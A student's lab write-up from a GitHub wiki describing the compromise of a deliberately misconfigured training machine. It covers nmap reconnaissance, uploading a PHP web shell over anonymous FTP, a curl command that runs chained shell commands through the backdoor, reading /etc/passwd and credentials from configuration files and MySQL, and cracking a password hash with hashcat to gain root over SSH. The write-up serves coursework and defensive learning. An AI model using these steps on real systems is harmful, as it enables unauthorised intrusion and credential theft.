Lab 7.1: Exploiting Pippin - morgan-hanrahan/Tech-Journal GitHub Wiki

Reflection

In this lab we examined a misconfigured system and learned different techniques to gain access to the system. We also learned about the dangers of having an insecure configuration on a system and the consequences this can lead to. The primary error committed by Pippin's system administrator was having an anonymous FTP server that allows file uploads. This error allowed us to obtain control of the system while also exposing it to significantly greater risk. Another mistake was the repetition of passwords and the use of weak passwords. We were able to retrieve the password hash of the user Pippin in the mysql database. This turned out to be the same password as the root user, allowing us to get root access to the system. For this particular assignment, I was very unfamiliar with using FTP and needed assistance from one of the hint videos my instructor provided. After watching the video, I became more confident with FTP and was able to accomplish the rest of the tasks on my own.

Webshell Assignment

We started with a websells assignment before diving into this lab. This task was quite simple, consisting of configuring a PHP web server with a web shell. For the final task of this assignment we were to curl a webserver to get the ip address information, the current user, echo to create a script.sh file that contains a ping request, changing the script to executable, and running that script. The command I used for this was:

curl 127.0.0.1:8090/simple-backdoor.php?cmd="ip+a;whoami;echo+'ping%20%2Dc%201%208.8.8.8'>script.sh;chmod+777+script.sh;./script.sh"

File Vulnerability Lab

Reconnaissance

To begin the reconnaissance, I first ran an nmap scan using the command: nmap -sV --open 10.0.5.25. This allowed me to see all the open ports, their services, and versions on the target system. I was able to see that vsftpd, OpenSSH, and Apache were running on the system. I thought that FTP was an interesting find and that I might be able to use that to exploit the server. I also looked into the services as they respond to client applications.

Gaining Access

Since the system was misconfigured it allowed for an anonymous FTP server that allows file uploads. I was able to run the command ftp -i 10.0.5.25``. This allowed me to access the FTP server anonymously using the password ``password. Once I was on the FTP server I was able to upload my own test file that I titled tEsT.txt, using the command put tEsT.txt.

Once I knew the test file uploaded correctly, I copied the contents of the /usr/share/webshells/php/simple-backdoor.php into a file I named tEsT.php. This was done using the following commands. - cp /usr/share/webshells/php/simple-backdoor.php . - mv simple-backdoor.php tEsT.php

By doing this I was able to get the output of the /etc/passwd file. For here I found four accounts of interest, that were clearly put there by whoever installed the operating system. Now looking back at the contents of the LocalSettings.php file I was able to see that the wgDMpassword was contained in this file. Using this password I was able to login to the peregrin.took account.

Next, I was determined to gain root access, so I looked into the mysql database using mysql -u root -p. I found an interesting database titled mediawiki. Inside this database was a table titled user. In the user table I selected both user_name and user_password and was able to find a password hash.

Then I created two files. The testWords.txt consists of all the words in the rockyou.txt file that begin with a lowercase p. This was done by using the command: cat /usr/share/wordlists/rockyou.txt | grep '^p' >> testWords.txt. The pipHash.txt file contains the contents of the hash found in the user table in mysql. With these files I ran the command: hashcat -m 12100 pipHash.txt -w4 -a0 testWords.txt in order to crack the password. From the scan I was able to determine the password was palentir. Using ssh [email protected] I was able to ssh into the root account using the password I just found.